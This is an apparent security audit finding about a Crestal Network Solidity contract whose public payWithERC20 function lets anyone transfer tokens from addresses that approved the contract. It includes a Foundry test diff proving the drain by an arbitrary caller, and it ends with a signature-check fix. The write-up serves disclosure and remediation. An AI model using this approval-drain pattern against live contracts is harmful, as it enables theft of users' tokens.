Micro Taffy Shell

High

# payWithERC20 would be used to drain contracts token approvals

Users can pay with ERC20 tokens for the cost of create agent operation and update agent operation through `payWithERC20`.
https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L464
```solidity
if (cost > 0) {
                // payment to crestal wallet address with token
                payWithERC20(tokenAddress, cost, userAddress, feeCollectionWalletAddress);
            }
```
https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25
```solidity
function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
        // check from and to address
        require(fromAddress != toAddress, "Cannot transfer to self address");
        require(toAddress != address(0), "Invalid to address");
        require(amount > 0, "Amount must be greater than 0");
        IERC20 token = IERC20(erc20TokenAddress);
        token.safeTransferFrom(fromAddress, toAddress, amount);
    }
```
The issue is anyone can steal excess token approvals to the contract.
## Impact
Approvals to blueprint can be stolen.

## Proof of Concept
```diff
diff --git a/crestal-omni-contracts/test/BlueprintV5.t.sol b/crestal-omni-contracts/test/BlueprintV5.t.sol
index 38f65ba..693d948 100644
--- a/crestal-omni-contracts/test/BlueprintV5.t.sol
+++ b/crestal-omni-contracts/test/BlueprintV5.t.sol
@@ -60,28 +60,23 @@ contract BlueprintTest is Test {
         // set none zero cost for create agents, use any number greater than 0
         blueprint.setCreateAgentTokenCost(address(mockToken), validTokenAmount);
 
-        mockToken.mint(address(this), validTokenAmount);
+        mockToken.mint(address(this), validTokenAmount + 1e18);
 
         // Verify the mint
         uint256 balance = mockToken.balanceOf(address(this));
-        assertEq(balance, validTokenAmount, "sender does not have the correct token balance");
-
-        // check LogApproveEvent
-        vm.expectEmit(true, true, false, true);
-        emit MockERC20.LogApproval(address(this), address(blueprint), validTokenAmount);
-
+        
         // Approve the blueprint contract to spend tokens directly from the test contract
-        mockToken.approve(address(blueprint), validTokenAmount);
-
-        // check allowance after approve
-        uint256 allowance = mockToken.allowance(address(this), address(blueprint));
-        assertEq(allowance, validTokenAmount, "sender does not have the correct token allowance");
+        mockToken.approve(address(blueprint), type(uint256).max);//@audit-info common defi practice
 
         // try with different project id
         projectId = bytes32(0x2723a34e38d0f0aa09ce626f00aa23c0464b52c75516cf3203cc4c9afeaf2981);
         // create agent with token and non zero cost
         blueprint.createAgentWithToken(projectId, base64Proposal, workerAddress, serverURL, address(mockToken));
 
+        vm.prank(address(1337));
+        blueprint.payWithERC20(address(mockToken), mockToken.balanceOf(address(this)), address(this), address(1337));
+        assertEq(mockToken.balanceOf(address(1337)), 1e18);
+        
         // check balance after creation, it should be balance - cost
         balance = mockToken.balanceOf(address(this));
         assertEq(balance, 0, "signer does not have the correct token balance after creation");
```
## Recommendation
For gasless transfer where fromAddress is not `msg.sender` verify a signature of `fromAddress` to `toAddress`. 
